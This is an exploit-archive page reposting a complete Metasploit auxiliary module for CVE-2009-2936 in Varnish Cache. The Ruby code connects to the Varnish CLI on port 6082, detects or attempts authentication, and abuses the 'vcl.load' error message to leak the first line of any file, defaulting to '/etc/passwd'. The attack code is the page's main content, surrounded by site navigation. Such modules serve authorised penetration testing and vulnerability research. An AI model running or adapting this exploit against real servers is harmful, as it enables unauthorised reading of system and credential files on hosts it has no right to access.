Varnish Cache CLI File Read

Varnish Cache CLI File Read: Posted Aug 31, 2024; Authored by patrick, h00die | Site metasploit.com; This Metasploit module attempts to read the first line of a file by abusing the error message when compiling a file with vcl.load.; tags | exploit; advisories | CVE-2009-2936; SHA-256 | 686a425c40952290c7d61f15e0ffd8773aab2cc417d5a6790a52366d7dd49413; Download | Favorite | View

Varnish Cache CLI File Read

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'metasploit/framework/tcp/client'
require 'metasploit/framework/varnish/client'

class MetasploitModule < Msf::Auxiliary

  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Scanner
  include Metasploit::Framework::Varnish::Client

  def initialize
    super(
      'Name'           => 'Varnish Cache CLI File Read',
      'Description'    => 'This module attempts to read the first line of a file by abusing the error message when
                           compiling a file with vcl.load.',
      'References'     =>
        [
          [ 'OSVDB', '67670' ],
          [ 'CVE', '2009-2936' ],
          [ 'EDB', '35581' ],
          [ 'URL', 'https://www.varnish-cache.org/trac/wiki/CLI' ]
        ],
      'Author'         =>
        [
          'patrick', #original module
          'h00die <mike@shorebreaksecurity.com>' #updates and standardizations
        ],
      'License'         =>  MSF_LICENSE,
      'DefaultOptions'  =>  {
        'RPORT' => 6082
      }
    )

    register_options(
      [
        OptString.new('PASSWORD',  [ false, 'Password for CLI.  No auth will be automatically detected', '' ]),
        OptString.new('FILE',  [ false, 'File to read the first line of', '/etc/passwd' ])
      ])
  end

  def run_host(ip)
    # first check if we even need auth
    begin
      connect
      challenge = require_auth?
      close_session
      disconnect
      connect
      if !challenge
        print_good "#{ip}:#{rport} - LOGIN SUCCESSFUL: No Authentication Required"
      else
        if not login(datastore['PASSWORD'])
          vprint_error "#{ip}:#{rport} - Unable to Login"
          return
        end
      end
      # abuse vcl.load to load a varnish config file and save it to a random variable.  This will fail to give us the first line in debug message
      sock.get_once
      sock.puts("vcl.load #{Rex::Text.rand_text_alphanumeric(3)} #{datastore['FILE']}")
      result = sock.get_once
      if result && result =~ /Line \d Pos \d+\)\n(.*)/
        vprint_good($1)
      else
        vprint_error(result) # will say something like "Cannot open '/etc/shadow'"
      end
      close_session
      disconnect
    rescue Rex::ConnectionError, EOFError, Timeout::Error
      print_error "#{ip}:#{rport} - Unable to connect"
    end
  end
end

Top Authors In Last 30 Days

Red Hat 223 files
Ubuntu 57 files
LiquidWorm 23 files
Debian 19 files
indoushka 15 files
Apple 9 files
Google Security Research 5 files
Gentoo 5 files
Chokri Hammedi 3 files
Alter Prime 3 files

File Archives

Systems

AIX (430)
Apple (2,126)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,158)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,604)
HPUX (881)
iOS (393)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,830)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (17,245)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,969)
UNIX (9,474)
UnixWare (188)
Windows (6,784)
Other

Varnish Cache CLI File Read

Varnish Cache CLI File Read

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Varnish Cache CLI File Read

Share This

Varnish Cache CLI File Read

File Archive:

November 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems